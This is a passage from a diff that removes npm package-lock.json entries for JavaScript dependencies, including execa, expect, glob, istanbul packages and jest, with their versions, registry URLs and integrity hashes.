"^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "node_modules/fast-levenshtein": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/fast-levenshtein/-/fast-levenshtein-2.0.6.tgz", - "integrity": "sha1-PYpcZog6FqMMqGQ+hR8Zuqd5eRc=", - "dev": true, - "peer": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/file-entry-cache": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/file-entry-cache/-/file-entry-cache-6.0.1.tgz", - "integrity": "sha512-7Gps/XWymbLk2QLYK4NzpMOrYjMhdIxXuIvy2QBsLE6ljuodKvdkWs/cpyJJ3CVIVpH0Oi1Hvg1ovbMzLdFBBg==", - "dev": true, - "peer": true, - "dependencies": { - "flat-cache": "^3.0.4" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "dependencies": { - "minimatch": "^5.0.1" - } - }, - "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/filelist/node_modules/minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/flat-cache": { - "version": "3.0.4", - "resolved": "https://registry.npmjs.org/flat-cache/-/flat-cache-3.0.4.tgz", - "integrity": "sha512-dm9s5Pw7Jc0GvMYbshN6zchCA9RgQlzzEZX3vylR9IqFfS8XciblUXOKfW6SiuJ0e13eDYZoZV5wdrev7P3Nwg==", - "dev": true, - "peer": true, - "dependencies": { - "flatted": "^3.1.0", - "rimraf": "^3.0.2" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/flatted": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.2.tgz", - "integrity": "sha512-JaTY/wtrcSyvXJl4IMFHPKyFur1sE9AUqc0QnhOaJ0CxHtAoIV8pYDzeEfAaNEtGkOfq4gr3LBFmdXW5mOQFnA==", - "dev": true, - "peer": true - }, - "node_modules/foreground-child": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.1.1.tgz", - "integrity": "sha512-TMKDUnIte6bfb5nWv7V/caI169OHgvwjb7V4WkeUvbQQdjr5rWKqHFiKWb/fcOwB+CzBT+qbWjvj+DVwRskpIg==", - "dependencies": { - "cross-spawn": "^7.0.0", - "signal-exit": "^4.0.1" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/foreground-child/node_modules/signal-exit": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", - "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "engines": { - "node": "*" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/functional-red-black-tree": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/functional-red-black-tree/-/functional-red-black-tree-1.0.1.tgz", - "integrity": "sha1-GwqzvVU7Kg1jmdKcDj6gslIHgyc=", - "dev": true, - "peer": true - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/glob-parent": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz", - "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==", - "dev": true, - "peer": true, - "dependencies": { - "is-glob": "^4.0.1" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/globals": { - "version": "13.10.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-13.10.0.tgz", - "integrity": "sha512-piHC3blgLGFjvOuMmWZX60f+na1lXFDhQXBf1UYp2fXPXqvEUbOhNwi6BsQ0bQishwedgnjkwv1d9zKf+MWw3g==", - "dev": true, - "peer": true, - "dependencies": { - "type-fest": "^0.20.2" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/ignore": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/ignore/-/ignore-4.0.6.tgz", - "integrity": "sha512-cyFDKrqc/YdcWFniJhzI42+AzS+gNwmUzOSFcRCQYwySuBBBy/KjuxWLZ/FHEH6Moq1NizMOBWyTcv8O4OZIMg==", - "dev": true, - "peer": true, - "engines": { - "node": ">= 4" - } - }, - "node_modules/import-fresh": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz", - "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==", - "dev": true, - "dependencies": { - "parent-module": "^1.0.0", - "resolve-from": "^4.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "dependencies": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - }, - "bin": { - "import-local-fixture": "fixtures/cli.js" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", - "dev": true, - "engines": { - "node": ">=0.8.19" - } - }, - "node_modules/inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "dev": true, - "dependencies": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "node_modules/inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "node_modules/is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha1-d8mYQFJ6qOyxqLppe4BkWnqSap0=", - "dev": true - }, - "node_modules/is-core-module": { - "version": "2.13.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", - "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", - "dev": true, - "dependencies": { - "hasown": "^2.0.0" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/is-extglob": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz", - "integrity": "sha1-qIwCU1eR8C7TfHahueqXc8gz+MI=", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "engines": { - "node": ">=8" - } - }, - "node_modules/is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/is-glob": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.1.tgz", - "integrity": "sha512-5G0tKtBTFImOqDnLB2hG6Bp2qcKEFduo4tZu9MT/H6NQv/ghhy30o55ufafxJ/LdH79LLs2Kfrn85TLKyA7BUg==", - "dev": true, - "peer": true, - "dependencies": { - "is-extglob": "^2.1.1" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true, - "engines": { - "node": ">=0.12.0" - } - }, - "node_modules/is-obj": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/is-obj/-/is-obj-2.0.0.tgz", - "integrity": "sha512-drqDG3cbczxxEJRoOXcOjtdp1J/lyp1mNn0xaznRs8+muBhgQcrnbspox5X5fOw0HnMnbfDzvnEMEtqDEJEo8w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha512-cyA56iCMHAh5CdzjJIa4aohJyeO1YbwLi3Jc35MmRU6poroFjIGZzUzupGiRPOjgHg9TLu43xbpwXk523fMxKA==" - }, - "node_modules/isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "node_modules/isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "peerDependencies": { - "ws": "*" - } - }, - "node_modules/isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha512-Yljz7ffyPbrLpLngrMtZ7NduUgVvi6wG9RJ9IUcyCd59YQ911PBJphODUcbOVbqYfxe1wuYf/LJ8PauMRwsM/g==" - }, - "node_modules/istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/istanbul-lib-instrument": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.2.tgz", - "integrity": "sha512-1WUsZ9R1lA0HtBSohTkm39WTPlNKSJ5iFk7UwqXkBLoHQT+hfqPsfsTDVuZdKGaBwn7din9bS7SsnoAr943hvw==", - "dev": true, - "dependencies": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "dependencies": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "dependencies": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "dependencies": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/jackspeak": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-2.3.6.tgz", - "integrity": "sha512-N3yCS/NegsOBokc8GAdM8UcmfsKiSS8cipheD/nivzr700H+nsMOxJjQnvwOcRYVuFkdH0wGUvW2WbXGmrZGbQ==", - "dependencies": { - "@isaacs/cliui": "^8.0.2" - }, - "engines": { - "node": ">=14" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - }, - "optionalDependencies": { - "@pkgjs/parseargs": "^0.11.0" - } - }, - "node_modules/jake": { - "version": "10.9.1", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.1.tgz", - "integrity": "sha512-61btcOHNnLnsOdtLgA5efqQWjnSi/vow5HbI7HMdKKWqvrKR1bLK3BPlJn9gcSaP2ewuamUSMB5XEy76KUIS2w==", - "dev": true, - "dependencies": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - }, - "bin": { - "jake": "bin/cli.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "dependencies": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - 